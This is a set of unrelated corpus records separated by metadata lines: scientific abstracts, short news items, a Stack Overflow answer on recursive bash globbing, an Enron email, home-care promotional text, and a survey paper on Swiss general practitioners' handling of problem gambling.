A diet enriched in linoleic acid compromises the cryotolerance of embryos from superovulated beef heifers. Dietary rumen-protected fat rich in linoleic acid may affect the superovulatory response and embryo yield; however, its effects on in vivo embryo cryotolerance are unknown in zebu cattle. The present study evaluated the production and cryotolerance after freezing or vitrification of embryos from Nelore heifers supplemented with rumen-protected polyunsaturated fatty acids (PUFA). Forty heifers kept in pasture were randomly distributed into two groups according to the type of feed supplement (F, supplement with rumen-protected PUFA, predominantly linoleic; C, control fat-free supplement with additional corn). Supplements were formulated to be isocaloric and isonitrogenous. Each heifer underwent both treatments in a crossover design with 70 days between replicates. After 50 days feeding, heifers were superovulated. Embryos were evaluated morphologically and vitrified or frozen. After thawing or warming, embryo development was evaluated in vitro. There was no difference between the F and C groups (P>0.10) in terms of embryo production. Regardless of the cryopreservation method used, Group C embryos had a greater hatching rate after 72h in vitro culture than Group F embryos (44.3±4.2% (n=148) vs 30.9±4.0% (n=137), respectively; P=0.04). Moreover, vitrified and frozen embryos had similar hatching rates (P>0.10). In conclusion, dietary rumen-protected PUFA rich in linoleic acid did not improve embryo production and compromised the cryotolerance of conventionally frozen or vitrified embryos from Nelore heifers.
null
minipile
NaturalLanguage
mit
null
IL-1 cytokines in cardiovascular disease: diagnostic, prognostic and therapeutic implications. Interleukins (ILs) are key mediators in the chronic vascular inflammatory response underlying several aspects of cardiovascular disease. Due to their powerful pro-inflammatory potential, and the fact that they are highly expressed by almost all cell types actively implicated in atherosclerosis, members of the IL-1 cytokine family were the first to be investigated in the field of vessel wall inflammation. The IL-1 family is comprised of five proteins that share considerable sequence homology: IL-1alpha, IL-1beta, IL-1 receptor antagonist (IL-1Ra), IL-18 (also known as IFNgamma-inducing factor), and the newly discovered ligand of the ST2L receptor, IL-33. Expression of IL-1s and their receptors has been demonstrated in atheromatous tissue, and serum levels of IL-1-cytokines have been correlated with various aspects of cardiovascular disease and their outcome. In vitro studies have confirmed pro-atherogenic properties of IL-1alpha, IL-1beta and IL-18 such as, up-regulation of endothelial adhesion molecules, the activation of macrophages and smooth muscle cell proliferation. In contrast with this, IL-1Ra, a natural antagonist of IL-1, possesses anti-inflammatory properties, mainly through the endogenous inhibition of IL-1 signaling. IL-33 was identified as a functional ligand of the, till recently, orphan receptor, ST2L. IL-33/ST2L signaling has been reported as a mechanically activated, cardioprotective paracrine system triggered by myocardial overload. As the roles of individual members of the IL-1 family are being revealed, novel therapies aimed at the modulation of interleukin function in several aspects of cardiovascular disease, are being proposed. Several approaches have produced promising results. However, none of these approaches has yet been applied in clinical practice.
null
minipile
NaturalLanguage
mit
null
Enter your email to subscribe: Republican Senate Candidate Christine O'Donnell's 2008 primary campaign manager Jonathon Moseley this week offered a $1,000.00 reward to anyone who could find the phrase "separation of church and state" in the Constitution. (Thanks to Carrie Beth Clark for the tip.) The offer comes on the heels of O'Donnell's statement in her debate last week with Democrat Chris Coons that the First Amendment contains no such phrase and requires no such separation. The phrase, of course, comes from Thomas Jefferson's January 1, 1802, letter to the Danbury Baptist Association in response to that group's address congratulating him on his election as president. The Library of Congress, with the help of the FBI, analyzed Jefferson's handwritten draft of the letter, including Jefferson's edits, and featured the letter in a 1998 exhibit on church and state. The LoC gives us an historical context here. The text of Jefferson's final letter is here; the unedited text is here. From the LoC: Jefferson revealed that he hoped to accomplish two things by replying to the Danbury Baptists. One was to issue a "condemnation of the alliance between church and state." This he accomplished in the first, printed, part of the draft. Jefferson's strictures on church-state entanglement were little more than rewarmed phrases and ideas from his Statutes Establishing Religious Freedom (1786) and from other, similar statements. To needle his political opponents, Jefferson paraphrased a passage, that "the legitimate powers of government extent to . . . acts only" and not to opinions, from the Notes on the State of Virginia, which the Federalists had shamelessly distorted in the election of 1800 in an effort to stigmatize him as an atheist. So politicized had church-state issues become by 1802 that Jefferson . . . considered the articulation of his views on the subject, in messages like the Danbury Baptist letter, as ways to fix his supporters' "political tenets." Here's what Moseley had to say: Jefferson was not in the Constitutional Convention that wrote the U.S. Constitution. . . . Jefferson was also not a member of the first U.S. Congress that wrote the Bill of Rights, either. . . . The law clerks over in the U.S. Supreme Court should stop reading people's letters and re-read the U.S. Constitution itself.
null
minipile
NaturalLanguage
mit
null
Joan Rivers' Doc Snapped a Selfie While She Was Under Anesthesia: Report Joan Rivers' personal doctor took a selfie while the comedian was under anesthesia and performed an unplanned biopsy on her after a New York City clinic medical director finished his scheduled endoscopy on the 81-year-old, a source told CNN this week. Yorkville Endoscopy has denied that a biopsy of Rivers' vocal cords was performed at the clinic but declined to release any further information because of federal privacy laws. Yorkville also told CNN that the doctor who performed the original endoscopy, Dr. Lawrence Cohen, was no longer serving as medical director there or doing medical procedures.
null
minipile
NaturalLanguage
mit
null
James H. Anderson (politician) James Hall Anderson (November 12, 1878 – 1936) was an American politician who served as the seventh Lieutenant Governor of Delaware, from January 20, 1925, to January 15, 1929, under Governor Robert P. Robinson. External links Delaware's Lieutenant Governors Category:Lieutenant Governors of Delaware Category:1878 births Category:1936 deaths
null
minipile
NaturalLanguage
mit
null
Q: Recursive glob? I'd like to write something like this:
$ ls **.py
in order to get all .py filenames, recursively walking a directory hierarchy. Even if there are .py files to find, the shell (bash) gives this output:
ls: cannot access **.py: No such file or directory
Any way to do what I want? EDIT: I'd like to specify that I'm not interested in the specific case of ls, but the question is about the glob syntax.
A: In order to do recursive globs in bash, you need the globstar feature from bash version 4 or higher. From the bash manpage:
globstar
If set, the pattern ** used in a pathname expansion context will match all files and zero or more directories and subdirectories. If the pattern is followed by a /, only directories and subdirectories match.
For your example pattern:
shopt -s globstar
ls **/*.py
A: find . -name '*.py'
** doesn't do anything more than a single *; both operate in the current directory.
A: Since Bash 4 (also including zsh) a new globbing option (globstar) has been added which treats the pattern ** differently when it's set. It matches the wildcard pattern and returns the file and directory names that match, then replaces the wildcard pattern in the command with the matched items. Normally when you use **, it works similarly to *, but it recurses through all the directories recursively (like a loop). To see if it's enabled, check it with shopt globstar (in scripting, use shopt -q globstar). The example **.py would work only for the current directory, as it doesn't return a list of directories which can be recursed into, so that's why you need the multiple-directory-level wildcard **/*.py, so it can go deeper. Please find on SO a few syntax tests which I did for finding all the files recursively.
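As a supplement to the answers above, here is a small self-contained demo of the globstar behaviour. It assumes bash 4 or newer, and the directory layout is invented purely for illustration:

#!/usr/bin/env bash
# Demo of ** (globstar) versus the default behaviour; all paths below are made up.
set -euo pipefail

demo=$(mktemp -d)                        # scratch directory for the demo
mkdir -p "$demo/pkg/sub"
touch "$demo/top.py" "$demo/pkg/a.py" "$demo/pkg/sub/b.py" "$demo/pkg/notes.txt"
cd "$demo"

shopt -s globstar                        # enable recursive ** matching
echo "globstar on,  **/*.py ->" **/*.py  # expected: pkg/a.py pkg/sub/b.py top.py

shopt -u globstar                        # back to the default behaviour
echo "globstar off, **/*.py ->" **/*.py  # ** now acts like *, i.e. */*.py: pkg/a.py only

cd / && rm -rf "$demo"                   # clean up

Running it prints the matched paths in both modes, which makes the difference between * and ** concrete without touching any real files.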
null
minipile
NaturalLanguage
mit
null
Kathy: Please issue a guest user id to Bob Lawrence at Milbank Tweed Hadley & McCloy. Bob is a lawyer helping us with various EnronOnline matters including Broker Connect. His e-mail address is [email protected]. Thanks, Mark
null
minipile
NaturalLanguage
mit
null
As we all know, home is the place of emotional and physical association, memories, and comfort. The hospital is the place for primary care for people suffering from chronic illness and acute issues. Many people feel upset about leaving their home. What can be the solution for this? asks Gary Ferone, who is the franchise owner of Assisting Hands in Stamford, Connecticut. The only solution for these people is home health care. Home health care is the fastest-growing segment, and providers offer a variety of different home health care services for seniors, including helping patients with daily needs. Is home health care really better than hospital care? The immediate answer is yes, and it comes with 5 reasons why it is better than hospital care. By receiving home health care services, patients can enjoy personal care in the comfort of their own homes and in the presence of their loved ones. Home health care helps and supports the family members, allowing them to enjoy quality time with their elderly loved ones. Home health care is recognized as the most cost-effective form of long-term health care when compared to hospitals. By having good quality nursing care at home, re-hospitalization gets reduced. In many cases, patients used to return to the hospital soon after their previous stay, and this may be costly and potentially harmful. Hence, this can be avoided with home health care services. Apart from all these facilities, family members and friends can visit the patients anytime they wish, compared to time-based visiting hours in the hospital. Are you finding it difficult to look after your parents due to the busy schedule of everyday life? You are one of the majority facing the same problem of taking good care of elderly family members because of the heavy workload of the professional sector. You do not have the option to stay at home in order to monitor your parents' health, but you cannot entirely concentrate on your work either. If that describes you, the situation has to come to an end. If one of your parents is handicapped or physically disabled, the situation might have got worse for you. So, how do you take care of your elderly family members and concentrate on your professional life at the same time? Are you aware of the concept of health care for handicapped people? No? You are missing out on a great solution. Go for one who is an expert when it comes to communicating with the elderly person. Well-skilled healthcare professionals are great at coordinating with patients. Good communication skill is the key to success. Look for one who is calm and collected: the ability to remain calm and cool-headed in every situation is a must when it comes to handling elderly or handicapped persons. Usually, these individuals are more likely to lose their self-esteem. They might be the victims of chronic depression and mood swings. A health care executive needs to balance every situation with utmost perfection and care. Assisting Hands Home Care, operated by Gary Ferone, has been providing the individuals of Stamford with very good home care services for a very long time. You never compromise on the safety of your family members, right? So, what do you do when it comes to taking care of a loving elderly person in your home? It might be one of your parents or anyone else who always holds your concern and care. It is quite natural that you hardly get the time to look after the loved ones due to your busy schedule.
So, how to solve the situation? Have you ever wondered about the effectiveness of the home health care solutions out there? Yeah, probably you are aware of the services, right? Then why not opt for one? What is a health care service, by the way? In case you are wondering, read on to know more. Lots of emotional and physical changes take place with passing time, especially while getting older. A proper health care solution can help you look after the elderly family members on a daily basis or periodically during the week. Sounds quite satisfactory, right? Do not delay to hire a great service provider of health care for elders at home. Are you wondering who would be the best home care service provider to opt for? Assisting Hands Home Care is here to solve all your problems. This organization is known to be a health care agency for elderly citizens. Gary Ferone, the owner of this organization, always makes sure that his team members provide the elders with utmost safety and comfort in their own home. They do not have to go to any hospitals or old age homes in order to live safely and peacefully. Assisting Hands Home Care and its efficient and compassionate team members are skilled enough to handle every kind of health issue of the elders. The professionals can take good care of the requirements of your loved ones. So, be in good hands with Gary Ferone and his team. There are many elderly patients who benefit from the home care options. It is suitable for elders who need only assistance with getting physical exercise, preparing meals, and bathing. But for some elders, the condition is very serious and they need several types of medications every day. So for that kind of elders, home care alone is not the right choice. They also require home health care services to assist them with other daily treatments and therapies. It can help the individuals to improve function and to live with greater independence. Health Care Services and Their Types. The home health care environment is entirely different from hospitals and any other environments. A patient can receive a number of home health care services at their home. It always depends on the individual patient's situation. Usually, your care plan and the services that you need at home are determined by the doctor. The services may include: A doctor may visit the patient's home to diagnose the illness and to give suitable treatment for it. The doctors may also every so often review the home health care requirements. The most common home health care service given to patients is nursing care, depending on their requirements. After consulting with the doctor, they may set up a plan of care which includes wound dressing, intravenous therapy, monitoring the health of the patients, and so on. Some patients may require help to perform their daily duties and to improve their speech after an illness. A physical therapist can handle this case by planning properly to help them regain function. How are patients helped by the occupational therapist? The patients can improve their physical, social, and emotional disabilities with the help of an occupational therapist. A speech therapist may help the patients to develop their ability to communicate clearly. The other types of services include helping them with basic personal needs like getting out of bed, walking, bathing, and so on. Training for the home health aides is also given under the supervision of the nurse.
When beginning an exercise program, it is very important to pace yourself and not risk injury by overexerting yourself from the get-go, especially if it has been a while since you worked out. Start slow: Do not just jump right in and start exercising five days a week, because that is a recipe for disaster; it is better to gradually work up to exercising several days per week while seeing how the body responds. Know when to stretch: Stretching right before a workout can seem like the best thing to do, but one might be putting himself or herself at risk of injury. Mix it up: Whether one is going for weight loss or bulking up, a mixed regimen of aerobic and strength training is the best way to achieve the body he or she wants, but even within those categories, do not stick to the same exercises every day. Know the weight and the right way to use it: Most people are confused the first time they walk into a gym but are afraid of asking for advice. Know when to take a break: When people start out, they are often overzealous and try to get to the gym every day, and by not letting the body rest, they can be doing much more harm than good. An aneurysm is a very weak point in an artery, and it most commonly occurs in the arteries of the brain or in the body's largest artery, which is the aorta. An aortic aneurysm can be in the chest, which is a thoracic aortic aneurysm, or in the abdomen, which is an abdominal aortic aneurysm. Most people with an aneurysm do not even know they have one, and if the aneurysm grows large enough, the artery wall may become so thin that blood begins to leak into the wall of the blood vessel, which is also known as dissection, or out into neighbouring tissues or parts of the body. When the brain is deprived of blood and therefore oxygen, a stroke results, and an accumulation of blood from a leaking brain aneurysm can press on areas of the brain, causing brain damage. When an aortic aneurysm leaks or ruptures, severe bleeding, also known as haemorrhage, may occur, and this is a medical emergency that requires immediate attention. Other groups who have a high risk of developing an aneurysm include people who smoke, have a family history of aneurysm, have high blood pressure, have atherosclerosis (blocked and weakened blood vessels), have untreated syphilis, have infections, have injuries, etc.
null
minipile
NaturalLanguage
mit
null
Crystal structure of the lactose operon repressor and its complexes with DNA and inducer. The lac operon of Escherichia coli is the paradigm for gene regulation. Its key component is the lac repressor, a product of the lacI gene. The three-dimensional structures of the intact lac repressor, the lac repressor bound to the gratuitous inducer isopropyl-beta-D-1-thiogalactoside (IPTG) and the lac repressor complexed with a 21-base pair symmetric operator DNA have been determined. These three structures show the conformation of the molecule in both the induced and repressed states and provide a framework for understanding a wealth of biochemical and genetic information. The DNA sequence of the lac operon has three lac repressor recognition sites in a stretch of 500 base pairs. The crystallographic structure of the complex with DNA suggests that the tetrameric repressor functions synergistically with catabolite gene activator protein (CAP) and participates in the quaternary formation of repression loops in which one tetrameric repressor interacts simultaneously with two sites on the genomic DNA.
null
minipile
NaturalLanguage
mit
null
Noted gun violence researcher Dr. Garen Wintermute, of the UC Davis Violence Prevention Research Program, says a just-released study that implies that gun laws save lives is inconclusive. The study, by Dr. Eric Fleegler of the Boston Children's Hospital, was released in the online version of the Journal of the American Medical Association. It looked at the number and strength of gun laws in each state and compared them to the number of firearms fatalities. There is a correlation. "What they found was that the more laws a state has on balance lower was its firearm mortality rate," said Wintermute. But he also said there is no evidence that gun laws were responsible for fewer gun deaths. "The fact that two things are present at the same time doesn't mean one of those things caused the other," said Wintermute.
null
minipile
NaturalLanguage
mit
null
Prevention of acute rejection episodes with an anti-interleukin 2 receptor monoclonal antibody. I. Results after combined pancreas and kidney transplantation. A prospective, randomized trial was conducted to evaluate the short-term and long-term effects of induction immunosuppression with the rat IgG 2a monoclonal antibody 33B3.1, directed against the human alpha chain of the interleukin 2-receptor, following primary, cadaveric, combined pancreas and kidney transplantation. Forty patients were randomly assigned to receive 10 mg/day of 33B3.1 (n = 20) or 1.5 mg/kg/day of rabbit antithymocyte globulin (n = 20) for the first 10 postoperative days. Azathioprine, low-dose corticosteroids, and cyclosporine were given in association with either 33B3.1 or ATG. All 40 patients received the entire 10-day bioreagent course and no episode of rejection was observed during this period. Although the incidence of rejection did not significantly differ within the first, second, and third postoperative months (ten 33B3.1 and 6 ATG patients experienced, respectively, 10 and 6 rejection episodes within the first 3 months), the total number of 33B3.1 patients experiencing rejection throughout the follow-up was significantly higher than that of ATG (13 versus 6; P < 0.02). Immunological graft failure accounted for 2 pancreas and 2 kidney losses in the 33B3.1 group versus 1 in the ATG one (P = ns). The total number of infectious episodes was similar in both groups (21 versus 23). Two malignancies were observed in the ATG group (1 responsible for patient's death). One 33B3.1 patient died because of infectious pneumonia and 3 ATG patients died because of 2 cardiovascular diseases and 1 cancer. All patients had functioning grafts at the time of death. The 3-month and 36-month patient, pancreas, and kidney actuarial survival rates were, respectively, 100, 65, and 100%, and 95, 50, and 82% in the 33B3.1 group and 95, 80, and 90%, and 80, 70, and 80% in the ATG one (P = ns). These data suggest that, although a significantly higher rejection episode incidence was observed in patients treated with 33B3.1 monoclonal antibody as compared with ATG, similar long-term results can be obtained following primary cadaveric combined pancreas/kidney transplantation.
null
minipile
NaturalLanguage
mit
null
1. Introduction {#sec1} =============== Pathological gambling (PG) has recently been added as a gambling disorder to the substance-related disorders chapter of DSM 5 \[[@B1]\], as a result of the empirical findings provided by the research literature supporting its similarity with substance use disorders (SUD). Indeed, it has been shown that PG shares clinical expression, comorbidity, neurobiological mechanisms \[[@B2]--[@B5]\], and treatment options \[[@B6]--[@B8]\] with SUD and reward-related behaviors. PG harm is related to its high psychiatric comorbidity, mostly substance use disorders \[[@B9]\], and to increased suicidal risk \[[@B10]\]. Vulnerable subgroup populations such as adolescents are also affected by gambling disorders \[[@B11]\]. Prevalence rates in the general population range from 0.2% to 2.1% \[[@B12]--[@B14]\] for pathological gamblers and from 0.6% to 5.5% for problem gamblers \[[@B13], [@B15]--[@B18]\]. The prevalence seems to be higher (6.2%) in primary care services \[[@B19]\]. Problem gamblers are hard to attract to treatment programs, partly due to their feelings of shame and denial \[[@B20]\]. Only 0.4% to 3% of them seek help for their difficulties \[[@B21], [@B22]\], and a five-year latent period is observed between the first symptomatic presentation and the first attempt to seek care \[[@B23]\]. Hence, general practitioners (GPs) as primary care providers have a crucial role to play in early detection of and intervention on problem gambling (PrG) \[[@B24], [@B25]\]. There is a paucity of studies on the PrG management resources and screening practices of GPs. Fourteen years ago, in Canada, a structured national plan was designed to involve physicians in PrG management \[[@B26]\]. The needs (PrG resources available and awareness of their existence) were studied in a sample of 54 physicians from the 800 contacted. Results showed low awareness of PrG resources, which participants considered insufficient to fulfill the needs \[[@B26]\]. Concern about the lack of knowledge, education, and training in PrG, and about its perception not as a medical problem but rather as a character defect, was raised among the challenges and obstacles to GPs' involvement in PrG management \[[@B26]\]. An Australian paper \[[@B24]\] presented the way GPs can help in early detection and intervention and reported a pilot project that provided resources to GPs. Results came from the 24 GPs (with referral experience in PrG) of the 51 that received information and material on PrG (e.g., its importance, a list of referral services, and simple advice on how to assist patients). The majority of participants were convinced of the role they can play in PrG management \[[@B24]\]. However, lack of knowledge was reported by almost half of the sample (even though they had referral experience in the field), as was a difficulty in asking patients "out of the blue" if they gamble \[[@B24]\]. Another awareness study of PrG in 180 health care providers (nurses, physicians, and social workers) \[[@B27]\] showed that the vast majority are aware of the existence of PrG but only a minority effectively screen their patients. Screening for health problems in care providers themselves is a question that is rarely asked. Regarding PG, a prevalence rate of 5% in American general practitioners has been reported \[[@B28]\]. This study aims first to evaluate the interest and knowledge of GPs regarding PrG and the way they deal with it in their daily clinical practice. Secondly, it aims to screen for PrG in GPs themselves. 2.
Methods {#sec2} ========== 2.1. Sample {#sec2.1} ----------- Swiss GPs with a medical practice in the 6 French-speaking areas (FSAs) of Switzerland were invited to participate anonymously in an online survey. Participants were recruited between March and May 2011 via their physician\'s regional association through an e-mail informing about the study\'s aims. The participants were directed through a web link to the questionnaire. 2.2. Measures {#sec2.2} ------------- A 24-item online questionnaire was developed for the study on Survey Monkey software. After sociodemographic data ([Table 1](#tab1){ref-type="table"}), five items investigated participants\' beliefs on PrG ([Table 2](#tab2){ref-type="table"}). Then, participants were asked about their PrG screening practice ([Table 3](#tab3){ref-type="table"}). They were presented a text-response item (to avoid oriented responses) to specify the PrG screening tools they use. They were also invited to estimate the rate of PrG and related debts issues in their active pool of patients. Practitioners were then asked how they manage PrG and its financial consequences in their patients ([Table 3](#tab3){ref-type="table"}). The last section of the questionnaire consisted of items on the participants\' impression about their knowledge of PrG disorder, on the existing specialized local treatment network, and their estimated need for information and training ([Table 4](#tab4){ref-type="table"}). At the end of the questionnaire, responders were themselves screened for PrG, using the 2-item Lie-bet test \[[@B29]\] "*Have you ever felt the need to bet more and more money?"* and*"Have you ever had to lie to people important to you about how much you gambled?"* ([Table 5](#tab5){ref-type="table"}). 2.3. Statistical Analysis {#sec2.3} ------------------------- SPSS 18.0 (Statistical Package for the Social Sciences, IBM Inc., Chicago) software program was used to perform the statistical analyses. First, descriptive statistics were computed for the participants\' characteristics (demographics and beliefs representation) and reported as medians, ranges, and percentages. For the sake of completeness, missing data are also provided in the tables. Next, we looked for associations between screening frequency and GPs\' interest in PrG, between knowledge of PrG, respectively, knowledge of PrG network, and screening practice for PrG, and finally between the need for information/training on PrG and knowledge of the topic, using the Pearson chi-square tests. When the expected frequency criteria were not met due to small cell sample size, adjacent categories were collapsed into smaller categories, where appropriate, in order to fulfill the necessary Pearson chi-square requirements and to gain statistical power. Two-by-two tables that did not meet these requirements were analyzed by the Fisher exact tests. Hence, for instance, knowledge of the topic reduces to two categories: very satisfactory/satisfactory versus insufficient/no knowledge. The same is the case for screening for excessive gambling frequency (systematically/often versus rarely/never) and demand for more information and training (total agreement/partial agreement versus partial disagreement/total disagreement). 3. Results and Discussion {#sec3} ========================= The survey was relatively well received by Swiss GPs\' professional associations in the French speaking area with 66% of acceptance to relay the information and the link to the online questionnaire. 
The sample consisted of 71 GPs accepting to participate in the survey. A majority of them (95.8%) filled out the questionnaires. Respondents were mostly men (63.2%), with a median age of 53 years and a median practice experience of 17 years as GP ([Table 1](#tab1){ref-type="table"}). The vast majority is qualified specialists in primary care (general practitioner and/or internist) and their area of practice is given in [Table 1](#tab1){ref-type="table"}. When GPs were asked to estimate PrG rate in their active pool of patients, more than half of them did not answer and 11% declared not knowing this rate, while 24% of them estimated this rate (between 1 and 30%). 3.1. GPs\' Beliefs on PrG and Financial Debts {#sec3.1} --------------------------------------------- The great majority (99%) expressly recognized believing in the potential addictive properties of gambling and 69% of them showed a keen interest in PrG with all the subsequent financial harm ([Table 2](#tab2){ref-type="table"}). Two-thirds of them (62%) characterized PrG as an important or very important issue of concern in the French-speaking area of Switzerland. The whole sample agreed that gambling could lead to indebtedness and 89% agreed with the worsening of indebtedness related to excessive gambling. 3.2. GPs\' Attitudes towards PrG {#sec3.2} -------------------------------- In their daily practice, while debts were often or systematically screened by 35% of the practitioners, PrG was screened only by a minority (7%) of them ([Table 3](#tab3){ref-type="table"}). Screening habits were during general history taking or PrG being discovered by chance with the occurrence of payment difficulties. There was no relationship found between screening frequency and GPs interest in it (*P* = 1). Investigating PrG management, 52% of GPs referred their patients to a specialist and 7% treated it themselves, while 32% stated they do not know what to do with these problematic patients and 3% do not address this issue at all ([Table 3](#tab3){ref-type="table"}). GPs promote a specialized approach to PrG treatment, in multidisciplinary centers (80%) and by private psychiatrists (3%). In debt management, GPs seemed to be more active than for PrG, with a greater rate of them treating it themselves (21%) and a lesser rate of "I do not know" (10%) responses. 3.3. Self-Reported Knowledge of PrG {#sec3.3} ----------------------------------- Participants estimated their knowledge of PrG and on specialized care network as being null (resp., 14% and 25%) or unsatisfying (resp., 65% and 45%) ([Table 4](#tab4){ref-type="table"}). This was found to be independent of their screening practice for problem gambling (resp., *P* = 0.2 and *P* = 0.1). The majority of participants reported a need for information (86%) and for training (77.5%) on PrG ([Table 4](#tab4){ref-type="table"}). This need was found to be independent of how satisfied they felt about their feeling as satisfied or not from their knowledge of the topic (*P* = 0.5). One participant screened himself positive for problem gambling according to Lie-bet items \[[@B29]\]. In summary, data showed that the majority of GPs considered gambling addictive and they believed in the importance of problem gambling in their area of practice, estimating furthermore a high rate of PrG and related indebtedness in their own patients. These results are different from those of the Canadian sample of physicians in 2000 \[[@B26]\] but similar to those from the Australian data in 2007 \[[@B24]\]. 
This highlights the possible mentality changes this last decade regarding PrG status as a medical disorder and constitutes a better chance for GPs to be motivated to play a role in its management. Nevertheless, screening practice was very low and PrG was often discovered by chance when patients experienced financial issues. In addition, GPs interested in PrG did not differ significantly in screening from those who declared less or no interest in the field. This could be explained by the gap between beliefs and attitudes in a real practice setting. Even if GPs believe and take interest in PrG, they probably tend to prioritize managing other disorders (i.e., somatic and/or with short- or medium-term vital risk). They could also feel a lack of time in their consultation to include questions on PrG \[[@B30]\]. This goes in line with the obstacles stated in recent literature to be facing GPs\' evolvement in PrG screening (e.g., "lack of time" and "PrG considered as a new problem having a low incidence") \[[@B26]\]. GPs could interest in PrG but could lack suitable and available resources and knowledge on PrG care management. The economically symptomatic PrG (i.e., patient declaring financial issues or incidents of fee payment issues) could be a sign of alert of the disorder for the practitioner, but unfortunately financial consequences are already present. This aspect could be addressed by renewed information on the vital risk of PrG (e.g., suicidal risk) and the importance of the early detection. GPs should also be trained and continuously trained to use basic and suitable PrG screening tools to detect patients before crisis-driven help seeking. GPs in the present work experienced to be screened for PrG using the Lie-bet items. This could have led to an awareness of an existing short and easy screening tool they can use in their daily practice. Another contrast between GPs beliefs and attitudes regarding PrG is that even if the majority of GPs knew the best treatment approach as being multidisciplinary, only half of them referred to these kinds of treatment systems. The poor knowledge reported on the specialized local treatment network could explain these findings. This aspect could be addressed by a wider dissemination, through GPs professional associations, of the current accessible information about PrG local treatment systems. Internet could be an interesting, fast, cost-effective, and easy-to-use vector for such information and training dissemination. Several countries have specific web-based information on PrG including information on the local and national specialized treatment centers (i.e., <http://www.sos-jeu.ch/>, <http://www.jeu-aidereference.qc.ca/>, and <http://www.problemgamblingguide.com/>). One possible intervention by GPs once patients screened could be a brief counseling consisting in the recommendation to their patients to visit such web pages to get information on the disorder and the specialized ways of help they could seek. Several medical associations have developed specific material targeting GPs to help them inform their patients on gambling and how to manage PrG in general practice \[[@B24]\]. Since problem gamblers seem to be more likely to accept help from their general practitioner regarding this disorder \[[@B31]\], pharmacotherapy for PrG \[[@B6]--[@B8]\] could be an interesting option as it fits with a general practice setting. 
A large number of participants stated themselves (79%) as dissatisfied with their knowledge of the disorder and the referring structures and the large majority of the sample declared needing more information (86%) and training (77.5%) on PrG and its management. This is a need that should be addressed by structured specific training and support strategies. Helplines for GPs and supervisions should be considered in addition to specifically designed training materials and settings (i.e., pregraduate, postgraduate, and continuous training). E-learning and distance supervisions (e.g., through e-mails or videoconferences) are emerging tools to build capacity that demonstrated efficacy in other fields in medicine web-platforms dedicated to map and to inform professionals on the tendencies on some addictive behaviors are currently developing \[[@B32]--[@B35]\]. The high rate of missing data concerned electively the second part of the questionnaire based on attitudes and knowledge. Taking into account that most of the participants answered to the beliefs, this could be explained by social desirability (i.e., difficulty to report the ignorance on a topic). With the lack of information on the rate of participants from the panel sought (unknown proportion of affiliated doctors in each professional association at the time of the study), the representativeness of the sample here studied is hard to describe. Furthermore, the only data available is the number of 1183 of Swiss doctors (including GPs) in outpatient sector of the geographic areas concerned by our survey \[[@B26], [@B27], [@B36]\]. Another limitation of this work is the predictable lack of statistical significance in the associations testing between beliefs and attitudes due to the small sample size and the missing data. However, descriptive data is the most important contribution of our work. Validity of our results can be appreciated by some indirect indicators. Firstly, data on GPs\' attitudes of PrG screening and knowledge are in line with previous studies \[[@B24]\]. Secondly, the proportion of probable PrG in the sample itself (1.5%) was situated in the range of the general Swiss population prevalence \[[@B15], [@B17]\]. Finally, even if the sample is moderate, a wide age range (34--70 years old) of GPs was represented. Participants, having done their medical studies at different periods in time, represent the panel of different considerations of the PrG as a disorder for the medical community in the last decades. To our knowledge, this is the first study specifically targeting GPs (regardless to their PrG referral experience) to investigate their beliefs, resources, and practice related to PrG, above all, in the era of an expanding offer of online gambling. 4. Conclusion {#sec4} ============= The results state that the vast majority of Swiss GPs that participated in the study are aware of the existence and the potential impact of PrG on their patients. But, as expected, the screening of PrG is not systematic and their knowledge of adequate treatments or referral methods is scarce. The discrepancy between beliefs in the harm related to PrG and the lack of its management could be addressed by information, training, and support for general practitioner. The implementation and success of such plan will be facilitated as GPs specifically stated this need. 
GPs being central to health screening in general and the pressure on them to screen almost all health issues, targeted advice and training (e.g., short screening tools, better knowledge of when to refer to a specialist, and effective pharmacotherapy strategies) should be promoted to empower the GP\'s management skills in the context of a public health approach. This training and information should be periodically renewed to face new challenges (e.g., Internet as a vector of gambling accessibility but also information and training vector) and to know new management strategies. Our findings can be the first stepping stone in the implementation of such capacity building strategy for PrG early detection and intervention according to the local context. Indeed, concrete tracks can be designed starting from this inventory of representations, knowledge, practice habits, and needs. Such strategy could be inspired by previous afterthoughts \[[@B24]--[@B26]\]. This study may have served as a brief intervention to remind the existence and the harms of this disorder. Screening problematic gambling in GPs themselves could have been a novel way to make them aware of possible simple and fast screening tools. The goal of enabling general practitioners is to improve the early detection of problem gamblers and to increase their treatment seeking. This survey benefited from a grant from Le Programme Intercantonal de Lutte contre la Dépendance au Jeu (PILDJ) 2011 that the authors thank for its support. They also thank the general practitioners associations of Suisse Romande for their support in the inclusions by disseminating information on the survey within their members. FSAs: : French-speaking areas GPs: : General practitioners PG: : Pathological gambling PrG: : Problem gambling. Conflict of Interests ===================== The authors declare that there is no conflict of interests regarding the publication of this paper. ###### Sociodemographic data. Total sample (*N* = 71)   ---------------------------------------------- ------------- Age (years), median (min--max) 53 (34--71) Gender, *n* (%)    Female 25 (35.2)  Male 43 (60.6)  Missing 3 (4.2) Practice duration (years), median (min--max) 17 (1--38) Medical specialization, *n* (%)    General practitioner 33 (46.5)  Internist 33 (46.5)  General practitioner and internist 1 (1.4)  Internist and other 3 (4.2)  No specialization 1 (1.4) Area of practice, *n* (%)    Fribourg 1 (1.4)  Geneva 31 (43.7)  Jura 0 (0)  Neuchâtel 23 (32.4)  Valais 0 (0)  Vaud 16 (22.5) ###### Participants beliefs on excessive gambling. 
